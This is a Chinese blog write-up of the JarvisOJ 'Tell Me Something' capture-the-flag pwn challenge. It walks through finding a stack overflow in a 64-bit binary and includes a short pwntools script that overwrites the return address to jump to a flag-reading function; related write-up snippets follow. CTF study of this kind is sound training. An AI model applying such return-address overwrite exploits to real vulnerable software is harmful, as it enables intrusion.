jarvisoj pwn tell me something

最新推荐文章于 2022-09-03 11:46:21 发布
最新推荐文章于 2022-09-03 11:46:21 发布
阅读量199 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Joey_l/article/details/97920892
版权

题目链接 https://www.jarvisoj.com/challenges

下载程序后,先file查看到文件为64位、动态链接

file guestbook

接着用checksec命令查看文件开启了哪些保护机制

checksec guestbook

用ida64打开程序,观察到main中的read函数存在溢出点,shift+F12可以看到有flag.txt文件,猜想程序中可能包含此文件

在函数窗口看到有good_game函数,打开,发现其中调用打开了flag.txt文件

思路:在main函数的溢出点输入一大串字符串,在其返回地址输入good_game函数的地址

打开函数的汇编,可查到good_game函数的地址为400620

重点来啦!!!我们看到main函数的汇编没有push ebp....而是直接sub rsp,88h   所以在帧栈中没有rbp

guestbook.py如下:

from pwn import *
sh=remote('own.jarvisoj.com',9876)

flag_add=0x400620
payload='a'*0x88+p64(flag_add)

sh.send(payload)
sh.interactive()
sh.close()

接着执行

python guestbook.py

 

Joey_l
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) Tell Me Something
Nothing
06-14 1012
(Jarvis Oj)(Pwn) Tell Me Something 首先查看程序开的保护。基本什么都没有。 丢到ida,主函数。 然后发现了good_game函数。 这个函数的用途就显而易见了,输出目录下的”flag.txt”文件。于是利用read函数导致的栈溢出,将返回地址覆盖为good_game函数的地址。通过ida或者cyclic工具可以获得需要的填充的长度。写得脚本...
18.9.20 Jarvis OJ PWN----Test Your Memory
qq_42192672的博客
09-20 328
先checksec一下 可以栈溢出 放到IDA里看一下,发现有system函数(在函数with_func调用),喜出望外,同时搜索字符串时,可以发现打开flag的指令,如下 再看一下哪里可以溢出,在mem_test函数,scanf就可以溢出 直接上脚本吧 #代码主体 system_addr=bin.symbols['win_func'] payload='a'*(0x...
[JarvisOJ][pwn]Test Your Memory
九层台
07-06 840
经历了前面2次的艰难,出题人或许嫌我们太累了,来了个简单的 走进程序找信息。开启的保护只有NX .rodata:080487E0 00000009 C cat flag 这里有命令字符串cat flag 0804A058 system 这里有system函数,然后找漏洞吧 int __cdecl mem_test(char *s2) {...
JarvisOJ PWN Tell me Something wp
苗_的博客
01-09 178
Tell me Something 先拖进ida里看一下,发现了"flag.txt"字符串,双击发现good_game函数: 查看主函数,发现其并没有调用goodgame函数: 所以我们输入大于buffer长度的数据,溢出的数据将会覆盖栈上的数据,因此我们将main的返回地址改成goodgame的地址,这样当main函数执行完之后,将会跳转到goodgame函数上进行执行,从而拿到...
jarvisoj——Tell Me Something
王嘟嘟的博客
07-14 559
本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。 题目 Wp 这里首先下载,然后ida打开,看到main函数 main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。 然后这里可以看到有一个good_gaem 可以看到是读取了一个flag.txt的文件。 那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。 最后就是先覆盖136的自身,然后加上good_game的地址即可。 pwntools fro
jarvisoj_tell_me_something
m0sway的博客
11-23 446
jarvisoj_tell_me_something 使用checksec查看: 看来又是一道栈溢出的题目,直接放IDA查看: 一眼看过去,main()函数就已经存在栈溢出了 查看字符串可以发现,存在一个flag.txt的字符串,跟进函数查看: 这个函数读取并打印了flag,so…我们只需要return到这个函数即可 需要注意的是: 函数起始的时候并没有将rbp压入栈,结束的时候也没有leave 所以我们在ret的时候不需要加上偏移,直接在0x88后面加上要ret的函数的地址 exp: from
jarvisoj_tell_me_something【BUUCTF】
qq_41696518的博客
09-03 195
那就很简单了,溢出指向漏洞函数即可,但此题有个小坑,其实最开始学pwn时会通过gdb查找溢出大小,但后面懒了就直接通过IDA查看,但IDA并不一定准确,并且题目本身也会有坑,比如该题。但本题,main函数没有push ebp的操作,所有溢出时不需要多加8字节ebp位置。
[BUUCTF]PWN——jarvisoj_tell_me_something
BangSen1的博客
03-18 766
jarvisoj_tell_me_something 例行检查,开启NX保护,64bit 运行一下 用IDA打开,看到了关键函数 flag.txt.跟进一下。 flag_addr=0x400620 看一下主函数。 输入的v4溢出漏洞,利用它覆盖返回地址为flag_addr的地址读出flag。 汇编结尾没有leave 起步刚开始就直接是rsp减去0x88,这里是没有把rbp压入栈,所以只需要0x88的数据大小,就可以覆盖返回地址了 from pwn import * r=remote('nod
18.9.19 Jarvis OJ PWN----Tell Me Something
qq_42192672的博客
09-19 200
我先checksec一下 可以栈溢出,发现主函数里的read函数就可以溢出 我们可以看到函数列表里还有个函数叫good_game 那直接覆盖然会地址就好啦 上脚本 #函数主体 cn.recvuntil("Input your message:\n") goodgame_addr=0x00400620 payload='a'*(0x88)+p64(goodgame_addr...
jarvisoj刷题之旅】pwn题目Tell Me Something的writeup
iqiqiya的博客
10-14 1002
题目信息: file一下  发现是64位的ELF checksec检查下安全性 objdump -t 文件名   可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...
jarvisoj pwn level5 wp
zszcr的博客
03-26 1965
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
Jarvis OJ-PWN
weixin_45461609的博客
08-08 254
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一关系也没有。 提供了system()函数 并且在mem_test函数的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
Jarvis OJ pwn刷题
清霂的博客
03-26 252
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 543
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
Matlab界面GUI设计的车牌定位[Matlab界面GUI设计].zip
最新发布
09-10
linux常用命令大全
【独家首发】基于matlab沙猫群算法SCSO-GMDH风电数据回归预测【含Matlab源码 7530期】.zip
09-10
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹; 步骤二:双击打开除Main.m的其他m文件; 步骤三:击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化GMDH回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化GMDH回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化GMDH回归预测 4.4.3 灰狼算法GWO/狼群算法WPA优化GMDH回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化GMDH回归预测 4.4.5 萤火虫算法FA/差分算法DE优化GMDH回归预测 4.4.6 其他优化算法优化GMDH回归预测
【2024首发原创】蜣螂优化算法DBO-TCN-LSTM-Multihead-Attention负荷预测Matlab实现.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
加速仪6050陀螺仪simulink.rar
09-10
加速仪6050陀螺仪simulink.rar
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值